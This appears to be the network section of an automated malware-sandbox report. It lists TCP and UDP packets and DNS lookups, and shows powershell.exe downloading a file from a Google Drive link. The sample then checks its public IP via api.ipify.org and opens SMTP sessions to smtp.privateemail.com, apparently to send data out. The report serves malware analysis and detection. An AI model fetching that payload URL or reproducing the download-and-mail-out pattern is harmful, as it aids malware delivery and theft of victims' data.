                                                                                  Apr 23, 2024 07:54:02.488171101 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.488225937 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.488230944 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.488275051 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.490158081 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.490209103 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.490226030 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.490267992 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.491868973 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.491914988 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.492784023 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.492831945 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.492846012 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.492887974 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.494967937 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.495016098 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.495027065 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.495069981 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.496361971 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.496516943 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.496531010 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.496654034 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.498032093 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.499805927 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.499826908 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.499838114 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.499860048 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.499881029 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.499886036 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.501583099 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.501601934 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.501610994 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.501636982 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.501655102 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.503304005 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.503386974 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.503396988 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.503432989 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.505037069 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.505179882 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.505188942 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.505259991 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.506803989 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.506869078 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.506875992 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.506916046 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.508435965 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.508492947 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.508500099 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.508537054 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.508543015 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.510190964 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.510256052 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.510272026 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.510315895 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.511738062 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.511797905 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.511802912 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.513281107 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.513391972 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.513442993 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.514453888 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.514520884 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.514525890 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.514632940 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.515872002 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.517647028 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.517697096 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.517704964 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.517714977 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.517740965 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.517761946 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.519102097 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.519154072 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.519160986 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.520153999 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.520694017 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.520756006 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.520761967 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.522247076 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.522305012 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.522313118 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.522888899 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.523794889 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.523879051 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.523885012 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.523952961 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.525262117 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.525315046 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.525342941 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.525439024 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.526874065 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.528165102 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.528192043 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.528232098 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.528386116 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.528423071 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.528471947 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.528506041 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.529907942 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.529966116 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.529977083 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.530013084 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.530019999 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.530052900 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.531737089 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.531791925 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.531816959 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.531861067 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.532987118 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.533041954 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.533744097 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.533787012 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.533802986 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.533905983 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.535254955 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.535298109 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.535310030 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.535348892 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.536818027 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.538104057 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.538170099 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.538167953 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.538187981 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.538228989 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.539534092 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.539657116 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.539664984 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.539701939 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.540873051 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.540921926 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.540927887 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.541017056 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.542133093 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.542180061 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.542212009 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.542306900 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.543462992 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.543526888 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.543580055 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.543617964 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.544763088 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.544804096 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.544811964 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.544881105 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.544929981 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.544970989 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.544989109 CEST44349724142.251.35.161192.168.2.6
                                                                                  Apr 23, 2024 07:54:02.545001030 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:02.545119047 CEST49724443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:54:05.505331039 CEST49725443192.168.2.6172.67.74.152
                                                                                  Apr 23, 2024 07:54:05.505374908 CEST44349725172.67.74.152192.168.2.6
                                                                                  Apr 23, 2024 07:54:05.505497932 CEST49725443192.168.2.6172.67.74.152
                                                                                  Apr 23, 2024 07:54:05.507111073 CEST49725443192.168.2.6172.67.74.152
                                                                                  Apr 23, 2024 07:54:05.507126093 CEST44349725172.67.74.152192.168.2.6
                                                                                  Apr 23, 2024 07:54:05.695281982 CEST44349725172.67.74.152192.168.2.6
                                                                                  Apr 23, 2024 07:54:05.695446968 CEST49725443192.168.2.6172.67.74.152
                                                                                  Apr 23, 2024 07:54:05.697231054 CEST49725443192.168.2.6172.67.74.152
                                                                                  Apr 23, 2024 07:54:05.697238922 CEST44349725172.67.74.152192.168.2.6
                                                                                  Apr 23, 2024 07:54:05.697632074 CEST44349725172.67.74.152192.168.2.6
                                                                                  Apr 23, 2024 07:54:05.701782942 CEST49725443192.168.2.6172.67.74.152
                                                                                  Apr 23, 2024 07:54:05.744160891 CEST44349725172.67.74.152192.168.2.6
                                                                                  Apr 23, 2024 07:54:05.974977970 CEST44349725172.67.74.152192.168.2.6
                                                                                  Apr 23, 2024 07:54:05.975042105 CEST44349725172.67.74.152192.168.2.6
                                                                                  Apr 23, 2024 07:54:05.975421906 CEST49725443192.168.2.6172.67.74.152
                                                                                  Apr 23, 2024 07:54:05.978415966 CEST49725443192.168.2.6172.67.74.152
                                                                                  Apr 23, 2024 07:54:07.379071951 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:07.526961088 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:07.527173042 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:07.950046062 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:07.950285912 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:08.097513914 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:08.097856045 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:08.098038912 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:08.245395899 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:08.245855093 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:08.393666029 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:08.394992113 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:08.395052910 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:08.395148039 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:08.395230055 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:08.395247936 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:08.395241976 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:08.395342112 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:08.417037964 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:08.565795898 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:08.565906048 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:08.605761051 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:08.712383986 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:08.859646082 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:08.860321999 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:08.860677004 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:09.008167982 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:09.009886026 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:09.010181904 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:09.157886028 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:09.162523031 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:09.162894011 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:09.310655117 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:09.313886881 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:09.314153910 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:09.461518049 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:09.509691000 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:09.510088921 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:09.658278942 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:09.658787966 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:09.659394026 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:09.659471035 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:09.659487009 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:09.659518003 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:09.806998968 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:09.807058096 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:09.807096004 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:09.975280046 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:10.027517080 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:10.299622059 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:10.447508097 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:10.448683023 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:10.448700905 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:10.448770046 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:10.449167013 CEST49726587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:10.450089931 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:10.598283052 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:10.598380089 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:10.614702940 CEST5874972666.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.297290087 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.297785044 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:11.445868015 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.446373940 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.446629047 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:11.594088078 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.594435930 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:11.742103100 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.742131948 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.742872953 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:11.743185043 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:11.890408039 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.890434027 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.890486002 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.890963078 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:11.891191959 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.038656950 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.039805889 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.040160894 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.188082933 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.190781116 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.190989971 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.338622093 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.341419935 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.341722965 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.489399910 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.531970978 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.532202959 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.679991007 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.680208921 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.680705070 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.680759907 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.680788994 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.680824041 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.680857897 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.680927992 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.680958033 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.680998087 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.681020021 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.681044102 CEST49727587192.168.2.666.29.159.53
                                                                                  Apr 23, 2024 07:54:12.828202963 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.828232050 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.828252077 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.828306913 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.828445911 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:12.828504086 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:13.006736994 CEST5874972766.29.159.53192.168.2.6
                                                                                  Apr 23, 2024 07:54:13.058762074 CEST49727587192.168.2.666.29.159.53

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Apr 23, 2024 07:53:27.584307909 CEST5000453192.168.2.61.1.1.1
                                                                                  Apr 23, 2024 07:53:27.672594070 CEST53500041.1.1.1192.168.2.6
                                                                                  Apr 23, 2024 07:53:28.149734020 CEST6103353192.168.2.61.1.1.1
                                                                                  Apr 23, 2024 07:53:28.239141941 CEST53610331.1.1.1192.168.2.6
                                                                                  Apr 23, 2024 07:54:05.349443913 CEST5793853192.168.2.61.1.1.1
                                                                                  Apr 23, 2024 07:54:05.437577963 CEST53579381.1.1.1192.168.2.6
                                                                                  Apr 23, 2024 07:54:07.281855106 CEST5594553192.168.2.61.1.1.1
                                                                                  Apr 23, 2024 07:54:07.377547979 CEST53559451.1.1.1192.168.2.6

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Apr 23, 2024 07:53:27.584307909 CEST192.168.2.61.1.1.10xef07Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                  Apr 23, 2024 07:53:28.149734020 CEST192.168.2.61.1.1.10xc83fStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                  Apr 23, 2024 07:54:05.349443913 CEST192.168.2.61.1.1.10xbd12Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                  Apr 23, 2024 07:54:07.281855106 CEST192.168.2.61.1.1.10x5f3dStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Apr 23, 2024 07:53:27.672594070 CEST1.1.1.1192.168.2.60xef07No error (0)drive.google.com142.250.65.174A (IP address)IN (0x0001)false
                                                                                  Apr 23, 2024 07:53:28.239141941 CEST1.1.1.1192.168.2.60xc83fNo error (0)drive.usercontent.google.com142.251.35.161A (IP address)IN (0x0001)false
                                                                                  Apr 23, 2024 07:54:05.437577963 CEST1.1.1.1192.168.2.60xbd12No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                  Apr 23, 2024 07:54:05.437577963 CEST1.1.1.1192.168.2.60xbd12No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                  Apr 23, 2024 07:54:05.437577963 CEST1.1.1.1192.168.2.60xbd12No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                  Apr 23, 2024 07:54:07.377547979 CEST1.1.1.1192.168.2.60x5f3dNo error (0)smtp.privateemail.com66.29.159.53A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • drive.google.com
                                                                                  • drive.usercontent.google.com
                                                                                  • api.ipify.org

                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.649715142.250.65.174443416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-23 05:53:27 UTC215OUTGET /uc?export=download&id=1r688rMF1EKKwt19kWaHjjLQtOMQJh-e6 HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                  Host: drive.google.com
                                                                                  Connection: Keep-Alive
                                                                                  2024-04-23 05:53:28 UTC1582INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Tue, 23 Apr 2024 05:53:28 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1r688rMF1EKKwt19kWaHjjLQtOMQJh-e6&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
